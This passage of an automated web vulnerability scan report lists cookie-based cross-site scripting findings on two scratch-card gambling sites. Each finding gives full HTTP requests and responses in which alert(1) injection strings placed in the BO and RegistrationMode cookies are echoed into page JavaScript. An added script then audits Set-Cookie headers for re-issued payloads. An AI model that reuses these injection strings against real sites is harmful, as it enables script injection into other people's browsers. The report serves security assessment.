Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc088a"-alert(1)-"70c96cb89d5";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.398. http://www.scratch2cash.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d468"-alert(1)-"461686b0f2a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM2d468"-alert(1)-"461686b0f2a; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: BO=FM2d468"-alert(1)-"461686b0f2a; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2d468"-alert(1)-"461686b0f2a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.399. http://www.scratch2cash.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffd5"-alert(1)-"2e2cefb717e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM2ffd5"-alert(1)-"2e2cefb717e; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2ffd5"-alert(1)-"2e2cefb717e; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2ffd5"-alert(1)-"2e2cefb717e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.400. http://www.scratch2cash.com/UnderAge.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e0d"-alert(1)-"52b3aba56ef was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM68e0d"-alert(1)-"52b3aba56ef; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: BO=FM68e0d"-alert(1)-"52b3aba56ef; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM68e0d"-alert(1)-"52b3aba56ef";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.401. http://www.scratch2cash.com/UnderAge.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 526d6"-alert(1)-"aab7963d8e1 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM526d6"-alert(1)-"aab7963d8e1; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM526d6"-alert(1)-"aab7963d8e1; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM526d6"-alert(1)-"aab7963d8e1";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.402. http://www.scratchcardheaven.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff42d"-alert(1)-"1bbf6ee4b12 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMff42d"-alert(1)-"1bbf6ee4b12; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: BO=FMff42d"-alert(1)-"1bbf6ee4b12; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMff42d"-alert(1)-"1bbf6ee4b12";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...
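Every response in this section re-issues the cookie it just reflected, payload included, with a three-year expiry and a domain attribute covering the whole registrable domain. That is the detail that turns a cookie-only reflection from a one-off into something that persists, and it is cheap to check for when reviewing scan evidence. The following is an added example, not part of the report: it audits a response's Set-Cookie headers against the request's Cookie header and flags values that were copied back verbatim despite carrying script-breaking characters. The sample headers are transcribed from finding 3.402 above; the function names are this example's own.

```javascript
// Added example, not part of the original report: audit the Set-Cookie
// headers of a response against the Cookie header of the request that
// produced it. It flags cookies whose value was copied back verbatim from the
// request even though it contains script-breaking characters (the server
// re-issues the attacker's value, so it persists until "expires"), and
// reports which cookies are scoped with a domain attribute to every host
// under that domain. Sample headers are transcribed from finding 3.402.

const SAMPLE_REQUEST_COOKIE =
  'UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; ' +
  'RegistrationMode=PM; BO=FMff42d"-alert(1)-"1bbf6ee4b12; CountryCode=US; CSITemp=8';

const SAMPLE_SET_COOKIES = [
  'RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/',
  'BO=FMff42d"-alert(1)-"1bbf6ee4b12; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/',
  'UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/',
  'CSITemp=8; domain=scratchcardheaven.com; path=/',
];

// Characters that terminate or alter a double-quoted JavaScript string or
// an inline <script> block.
const SCRIPT_BREAKING = /["'\\<>]/;

// Split a request Cookie header into name -> value (the first "=" separates
// them, so values containing "=" such as CSI_8 survive intact).
function parseCookieHeader(header) {
  const cookies = {};
  for (const part of header.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    cookies[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return cookies;
}

// Split one Set-Cookie header into name, value and lower-cased attributes.
function parseSetCookie(line) {
  const [nameValue, ...attrParts] = line.split(';');
  const eq = nameValue.indexOf('=');
  const attrs = {};
  for (const part of attrParts) {
    const i = part.indexOf('=');
    const key = (i < 0 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i < 0 ? true : part.slice(i + 1).trim();
  }
  return { name: nameValue.slice(0, eq).trim(), value: nameValue.slice(eq + 1).trim(), attrs };
}

function auditSetCookies(requestCookieHeader, setCookieLines) {
  const sent = parseCookieHeader(requestCookieHeader);
  return setCookieLines.map(parseSetCookie).map((c) => ({
    name: c.name,
    value: c.value,
    // The request supplied this exact value and it carries script-breaking
    // characters: the server is persisting the injected payload.
    taintedReissue: sent[c.name] === c.value && SCRIPT_BREAKING.test(c.value),
    domainWide: typeof c.attrs.domain === 'string',
    expires: typeof c.attrs.expires === 'string' ? c.attrs.expires : null,
  }));
}

// Names of the cookies that re-issue a tainted request value.
function flaggedNames(report) {
  return report.filter((r) => r.taintedReissue).map((r) => r.name);
}

const SAMPLE_REPORT = auditSetCookies(SAMPLE_REQUEST_COOKIE, SAMPLE_SET_COOKIES);
```

Run against the transcribed headers, only BO is flagged: RegistrationMode and UniqueVisitorID are echoed too, but their values contain nothing that can leave a string literal, and CSITemp has no expires attribute and so lives only for the session. The check is deliberately narrow; it says nothing about whether an attacker can plant the cookie in the first place, which is the limitation the issue text describes.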

3.403. http://www.scratchcardheaven.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5a85"-alert(1)-"f7f57431a77 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMc5a85"-alert(1)-"f7f57431a77; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:29:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc5a85"-alert(1)-"f7f57431a77; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc5a85"-alert(1)-"f7f57431a77";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.404. http://www.scratchcardheaven.com/ContactUsMail.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351d1"-alert(1)-"d2667488539 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM351d1"-alert(1)-"d2667488539; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: BO=FM351d1"-alert(1)-"d2667488539; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM351d1"-alert(1)-"d2667488539";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.405. http://www.scratchcardheaven.com/ContactUsMail.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ac4"-alert(1)-"7b1c85d8d98 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMf7ac4"-alert(1)-"7b1c85d8d98; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMf7ac4"-alert(1)-"7b1c85d8d98; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMf7ac4"-alert(1)-"7b1c85d8d98";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.406. http://www.scratchcardheaven.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 675ff"-alert(1)-"e8312342e57 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

